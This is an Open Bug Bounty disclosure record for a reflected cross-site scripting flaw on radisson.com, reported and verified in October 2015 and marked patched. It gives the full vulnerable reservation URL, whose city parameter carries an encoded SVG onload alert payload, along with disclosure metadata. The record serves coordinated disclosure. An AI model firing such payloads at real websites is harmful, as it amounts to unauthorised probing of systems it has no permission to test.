radisson.com XSS vulnerability

2015-10-15T09:14:00
ID OBB:92215
Type openbugbounty
Reporter Gromak123_XSS
Modified 2015-10-15T09:17:00

Description

Vulnerable URL:
http://www.radisson.com/home/reservation/cityRateSearch.do;jsessionid=7bFqxqRQyeb51eAbcZ5iteYv3titkEm_6VSlL2f3mLIa0DgNTRbO!1604049258?promotionalCode=&rateSearchForm.redemptionSearch;=false&newSearch;=true&citySearchForm.singleSearchDisabled;=false&rateSearchForm.ecertCode;=&rateSearchForm.corporateAccountID;=&rateSearchForm.travelAgencyId;=&rateSearchForm.redemptionCalSearch;=false&citySearchForm.country;=&citySearchForm.state;=&citySearchForm.countryAndState;=&citySearchForm.singleTermSearch;=true&citySearchForm.usedAutocomplete;=false&city;=+%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSSPOSED%2F%29%3E&cityId;=0&rateSearchForm.hotelCodes;=&rateSearchForm.attractionId;=0&rateSearchForm.destinationSearchType;=&rateSearchForm.checkinDate;=10%2F16%2F2015&rateSearchForm.checkoutDate;=10%2F17%2F2015&rateSearchForm.numberRooms;=1&rateSearchForm.o;[0].a=1&rateSearchForm.o;[0].c=0&rateSearchForm.numberRooms;=1&rateSearchForm.o;[0].a=1&rateSearchForm.o;[0].c=0&rateSearchForm.rmcCode;=&rateSearchForm.smartBox;=&rateSearchForm.crossBrandSearch;=searchCrossBrand
Details:

Description| Value
---|---
Patched:| Yes, at 25.10.2015
Latest check for patch:| 25.10.2015 16:15 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 32729
Google Pagerank| 8
VIP website status:| Yes
Check radisson.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 15 October, 2015 09:14 GMT
Vulnerability existence verified and confirmed| 15 October, 2015 09:17 GMT